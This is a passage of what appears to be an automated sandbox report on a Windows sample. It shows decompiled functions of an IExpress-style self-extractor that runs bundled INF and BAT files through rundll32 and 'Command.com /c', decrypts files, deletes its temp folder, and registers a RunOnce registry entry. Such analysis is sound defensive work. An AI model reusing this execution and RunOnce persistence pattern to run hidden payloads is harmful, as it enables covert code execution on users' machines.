								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E0108171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E01081A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E01081A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E010844B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x1089120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x1081140, _t156, 8,  &_v268) == 0) {
										 *0x1089a34 =  *0x1089a34 & 0xfffffffb;
										if( *0x1089a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E0108171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x1089a34 =  *0x1089a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E01081680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E01081680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E01086CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}

0x01081af3
0x01081afa
0x01081b07
0x01081b09
0x01081b1a
0x01081b20
0x01081b2c
0x01081b3b
0x01081b40
0x01081b2e
0x01081b2e
0x01081b33
0x01081b33
0x01081b46
0x01081b4c
0x01081b52
0x01081b57
0x01081b5d
0x01081b61
0x01081b9f
0x01081b9f
0x01081bb1
0x01081bc2
0x00000000
0x01081b63
0x01081b63
0x01081b65
0x01081b68
0x01081b68
0x01081b6a
0x01081b6b
0x01081b6f
0x01081b74
0x00000000
0x00000000
0x01081b76
0x01081b7b
0x01081b86
0x00000000
0x00000000
0x00000000
0x00000000
0x01081b8c
0x01081b8c
0x01081b98
0x01081bc7
0x01081bc9
0x01081bcc
0x01081bd3
0x01081d75
0x01081d76
0x01081d78
0x01081d7f
0x01081e05
0x01081e09
0x00000000
0x00000000
0x01081e12
0x01081e1b
0x01081e73
0x01081e21
0x01081e21
0x01081e28
0x01081e37
0x01081e3e
0x01081e52
0x01081e60
0x01081e60
0x01081e3e
0x01081e79
0x01081e7b
0x01081e84
0x00000000
0x01081d9b
0x01081d9b
0x01081da0
0x01081da2
0x01081da5
0x01081da5
0x01081da7
0x01081da8
0x01081dac
0x01081dae
0x01081db4
0x01081db7
0x01081db7
0x01081db9
0x01081dba
0x01081dbe
0x01081dc3
0x01081dce
0x01081dd2
0x01081deb
0x00000000
0x01081df0
0x00000000
0x01081dd2
0x01081bf7
0x01081bfe
0x01081c07
0x01081d55
0x01081d5a
0x01081d5b
0x01081d5d
0x01081d5e
0x00000000
0x01081c1b
0x01081c1b
0x01081c20
0x01081c2c
0x01081c33
0x01081c38
0x01081c3a
0x01081c3a
0x01081c40
0x01081c4b
0x01081c4b
0x01081c5d
0x01081c61
0x01081dd4
0x01081dd4
0x01081dd6
0x01081ddb
0x01081ddc
0x01081dde
0x01081d64
0x01081d64
0x01081d67
0x01081d6c
0x00000000
0x01081c67
0x01081c67
0x01081c6d
0x01081c72
0x01081c74
0x01081c74
0x01081c8e
0x01081c99
0x01081cc0
0x01081cf8
0x01081d07
0x01081d23
0x01081d09
0x01081d14
0x01081d1b
0x01081d1b
0x01081d2b
0x01081d2d
0x01081d2d
0x01081d38
0x01081d39
0x01081d46
0x01081cc2
0x01081cc2
0x01081ccc
0x01081cce
0x01081cce
0x01081cdb
0x01081ce6
0x01081cee
0x01081cee
0x01081e89
0x01081e91
0x01081e92
0x01081e94
0x01081e97
0x01081ea4
0x01081ea4
0x01081c61
0x01081c07
0x01081bd3
0x01081b7b

APIs

CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 01081BE7
GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 01081BFE
LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 01081C57
GetPrivateProfileIntA.KERNEL32 ref: 01081C88
GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,01081140,00000000,00000008,?), ref: 01081CB8
GetShortPathNameA.KERNEL32 ref: 01081D1B

Part of subcall function 010844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01084518
Part of subcall function 010844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 01084554

Strings

rundll32.exe %s,InstallHinfSection %s 128 %s, xrefs: 01081D3B
Command.com /c %s, xrefs: 01081D9B, 01081DE8
", xrefs: 01081B25
.INF, xrefs: 01081BDB
.BAT, xrefs: 01081D83
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 01081BA0
Reboot, xrefs: 01081C82
AdvancedINF, xrefs: 01081CAE
setupapi.dll, xrefs: 01081D23, 01081D3A
DefaultInstall, xrefs: 01081C74, 01081C87, 01081CCE, 01081CD3, 01081D2D, 01081D39
setupx.dll, xrefs: 01081D14
Version, xrefs: 01081CB3

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
API String ID: 383838535-2869639027
Opcode ID: b8a3fd0566e39b5f0c729b583e05c993f781780d7144de7316cc84be574453d0
Instruction ID: bb45e3a57b3ee4adf668ada54bdf03ddd916d363a957aaeb96e51737e9b39765
Opcode Fuzzy Hash: b8a3fd0566e39b5f0c729b583e05c993f781780d7144de7316cc84be574453d0
Instruction Fuzzy Hash: A7A15870A0C2196FEF60BB28CC44BEA77A9AF55310F104299E5D5A72C0DBB59D87CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01082F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E01082F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0x1088004; // 0x4f5b7a6c
				_v8 = _t9 ^ _t46;
				if( *0x1088a38 != 0) {
					L5:
					_t11 = E01085164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E01086CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E010855A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E0108658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0x108a288("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0x1088a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0x1088a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0x1088d48 & 0x000000c0;
									if(( *0x1088d48 & 0x000000c0) == 0) {
										_t41 =  *0x1089a40; // 0x3, executed
										_t26 = E0108256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0x1088a24; // 0x0
									 *0x1089a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0x1088a38;
										if( *0x1088a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E01084169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0x1089a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E01083BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0x1088a24; // 0x0
										goto L26;
									}
								}
								_t27 = E01083B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E010844B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0x1089124 = E01086285();
							goto L16;
						}
						_t59 =  *0x1089a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E0108621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0x1088a24;
				if( *0x1088a24 != 0) {
					L4:
					_t34 = E01083A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E010851E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0x1088a38;
				if( *0x1088a38 != 0) {
					goto L5;
				}
				goto L4;
			}

0x01082f1d
0x01082f28
0x01082f2f
0x01082f3d
0x01082f6c
0x01082f6c
0x01082f71
0x01082f73
0x01083041
0x01083041
0x01083043
0x01083053
0x01083053
0x01082f79
0x01082f80
0x00000000
0x01082f86
0x01082f86
0x01082f93
0x01082f9e
0x01082fa0
0x01082fa6
0x01082fb8
0x01082fba
0x01082fbe
0x01082fc6
0x01082fcc
0x01082fd4
0x01082fd6
0x01082fd8
0x01082fe0
0x01082fe6
0x01082fee
0x01082ff0
0x01082ff5
0x01082ff5
0x01082fee
0x01082fd4
0x01082ff8
0x01082ffe
0x01083004
0x01083017
0x0108301c
0x01083024
0x01083054
0x0108305a
0x01083065
0x01083065
0x0108306c
0x0108306e
0x01083075
0x0108307a
0x0108307a
0x0108307c
0x01083081
0x01083087
0x01083089
0x010830a1
0x010830a1
0x010830a9
0x010830ab
0x010830ad
0x010830af
0x010830af
0x010830ad
0x010830b6
0x00000000
0x0108308b
0x0108308b
0x01083091
0x00000000
0x00000000
0x01083093
0x01083098
0x0108309a
0x00000000
0x00000000
0x0108309c
0x00000000
0x0108309c
0x01083089
0x0108305c
0x01083061
0x01083063
0x00000000
0x00000000
0x00000000
0x01083063
0x0108302b
0x01083032
0x0108303c
0x00000000
0x0108303c
0x01083006
0x0108300c
0x00000000
0x00000000
0x0108300e
0x01083015
0x00000000
0x00000000
0x00000000
0x01083015
0x01082f80
0x01082f3f
0x01082f46
0x01082f5f
0x01082f5f
0x01082f64
0x01082f66
0x00000000
0x00000000
0x00000000
0x01082f66
0x01082f4f
0x00000000
0x00000000
0x01082f55
0x01082f5d
0x00000000
0x00000000
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 01082F93
LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 01082FB2
GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 01082FC6
DecryptFileA.ADVAPI32 ref: 01082FE6
FreeLibrary.KERNEL32(00000000), ref: 01082FF8
SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0108301C

Part of subcall function 010851E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,01082F4D,?,00000002,00000000), ref: 01085201

Strings

advapi32.dll, xrefs: 01082F99
DecryptFileA, xrefs: 01082FC0
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 01082FDB, 01083017

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
API String ID: 2126469477-1274120739
Opcode ID: 7f55748f439fc17a5b84f8e775420bdbe1a723bfa2065640b14a3c32fee917ba
Instruction ID: 710291247ba897c609ee75ff230496acd1175c02d258adea50c2adb0cae195d3
Opcode Fuzzy Hash: 7f55748f439fc17a5b84f8e775420bdbe1a723bfa2065640b14a3c32fee917ba
Instruction Fuzzy Hash: 4F412C30A0C2058AEF71BB799C546AE77E4BBD4F55F0000A6FAC1CA185EB7AC581CF60

Uniqueness

Uniqueness Score: -1.00%

Function 01082390 Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E01082390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0x1088004; // 0x4f5b7a6c
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E01086CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E01081680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E010816B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E01081680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E010816B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E010816B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E0108658A( &_v280, 0x104, 0x1081140);
								E01082390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}

0x01082398
0x0108239e
0x010823a3
0x010823a5
0x010823ae
0x010823b3
0x010824cb
0x010824d2
0x010824d3
0x010824d4
0x010824df
0x010823c2
0x010823d1
0x010823db
0x010823e4
0x010823f6
0x010823fc
0x01082401
0x00000000
0x00000000
0x00000000
0x00000000
0x01082407
0x01082407
0x01082408
0x01082411
0x0108241f
0x0108247a
0x01082483
0x01082495
0x010824a3
0x01082421
0x0108242f
0x01082453
0x0108245d
0x01082466
0x01082472
0x01082472
0x0108242f
0x010824af
0x010824b5
0x010824be
0x010824c5
0x00000000
0x010824c5

APIs

FindFirstFileA.KERNELBASE(?,01088A3A,010811F4,01088A3A,00000000,?,?), ref: 010823F6
lstrcmpA.KERNEL32(?,010811F8), ref: 01082427
lstrcmpA.KERNEL32(?,010811FC), ref: 0108243B
SetFileAttributesA.KERNEL32(?,00000080,?), ref: 01082495
DeleteFileA.KERNEL32(?), ref: 010824A3
FindNextFileA.KERNELBASE(00000000,00000010), ref: 010824AF
FindClose.KERNELBASE(00000000), ref: 010824BE
RemoveDirectoryA.KERNELBASE(01088A3A), ref: 010824C5

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 836429354-0
Opcode ID: e93b81ac4f779c3ad02d86eed1ed290e7b5271cdaf9ce5da7daaac45f898b5fc
Instruction ID: 669e589e7875cceb9d1529c537fd530207d4c7a7159eef296b32415388511bb6
Opcode Fuzzy Hash: e93b81ac4f779c3ad02d86eed1ed290e7b5271cdaf9ce5da7daaac45f898b5fc
Instruction Fuzzy Hash: 0A31803160C6419FD730FAA8CC88AEF77E8AF84315F04492EA5D587140EF38954ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 01082BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E01082BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0x108a288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0x1089124 = 0;
				if(E01082CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E01082F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E010852B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0x1088a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0x1089a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E01081F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0x1088588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x1089124; // 0x0
				return _t7;
			}

0x01082c03
0x01082c0d
0x01082c18
0x01082c20
0x01082c2e
0x01082c32
0x01082c36
0x01082c3d
0x01082c43
0x01082c45
0x01082c47
0x01082c49
0x01082c4e
0x01082c4e
0x01082c47
0x01082c32
0x01082c20
0x01082c50
0x01082c54
0x01082c57
0x01082c64
0x01082c66
0x01082c6b
0x01082c6d
0x01082c74
0x01082c76
0x01082c7c
0x01082c7e
0x01082c87
0x01082c89
0x01082c89
0x01082c87
0x01082c7c
0x01082c74
0x01082c8e
0x01082c95
0x01082c98
0x01082c98
0x01082c9e
0x01082ca7

APIs

GetVersion.KERNEL32(?,00000002,00000000,?,01086BB0,01080000,00000000,00000002,0000000A), ref: 01082C03
GetModuleHandleW.KERNEL32(Kernel32.dll,?,01086BB0,01080000,00000000,00000002,0000000A), ref: 01082C18
GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 01082C28
CloseHandle.KERNEL32(00000000,?,?,01086BB0,01080000,00000000,00000002,0000000A), ref: 01082C98

Strings

Kernel32.dll, xrefs: 01082C13
HeapSetInformation, xrefs: 01082C22

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Handle$AddressCloseModuleProcVersion
String ID: HeapSetInformation$Kernel32.dll
API String ID: 62482547-3460614246
Opcode ID: 11a8db494d775f6cdf754241f958345ab2af6065c657f4c4d9ca7c01bdcb94a2
Instruction ID: ee997697015765f5008290d90c7946e23104c9a5c7592a2436c75c0976bb3b5b
Opcode Fuzzy Hash: 11a8db494d775f6cdf754241f958345ab2af6065c657f4c4d9ca7c01bdcb94a2
Instruction Fuzzy Hash: ED11CA7130C209DBE7307BF99D84A7F3BD9AB84794B440065FAC1D3244DA3AD842C760

Uniqueness

Uniqueness Score: -1.00%

Function 01086F40 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01086F40() {

				SetUnhandledExceptionFilter(E01086EF0); // executed
				return 0;
			}

0x01086f45
0x01086f4d

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 01086F45

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f7b4ba056e9d96ac82c50beb27d1ed7d69c298ec0494a102d2f95efa2778d11a
Instruction ID: a7b54248a2c7a617d371dcec5bf55847472287651f70bb58698173269982d4a6
Opcode Fuzzy Hash: f7b4ba056e9d96ac82c50beb27d1ed7d69c298ec0494a102d2f95efa2778d11a
Instruction Fuzzy Hash: D4900270359100879A202B71D91941975915A4D642B8254A5A1D1C988CDF6640405611

Uniqueness

Uniqueness Score: -1.00%

Function 0108202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185
registrylibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0108202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0x1088004; // 0x4f5b7a6c
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E01086CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E0108171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E0108658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0x1089a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0x10891e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0x10891e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x10891e5);
						if(_t90 != 0) {
							 *0x1088580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
							E0108171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E010844B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E0108658A( &_v268, 0x104, 0x1081140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0x1088530 = _t66;
				goto L23;
			}

0x0108202a
0x01082035
0x0108203c
0x01082041
0x01082050
0x0108205f
0x01082064
0x0108206f
0x0108208c
0x01082094
0x01082257
0x01082266
0x01082266
0x0108209a
0x0108209b
0x0108209d
0x010820aa
0x010820af
0x010820c9
0x010820d1
0x00000000
0x00000000
0x010820d3
0x010820da
0x00000000
0x00000000
0x00000000
0x010820da
0x010820e2
0x01082103
0x0108210e
0x01082116
0x01082122
0x01082128
0x0108212c
0x01082179
0x01082194
0x010821de
0x010821e4
0x01082256
0x01082256
0x00000000
0x01082256
0x01082196
0x01082196
0x0108219c
0x0108219f
0x0108219f
0x010821a1
0x010821a2
0x010821a6
0x010821a8
0x010821b0
0x010821b0
0x010821b2
0x010821b3
0x010821bc
0x010821c7
0x010821cb
0x010821f1
0x010821f6
0x010821fd
0x010821ff
0x010821ff
0x01082204
0x01082213
0x01082218
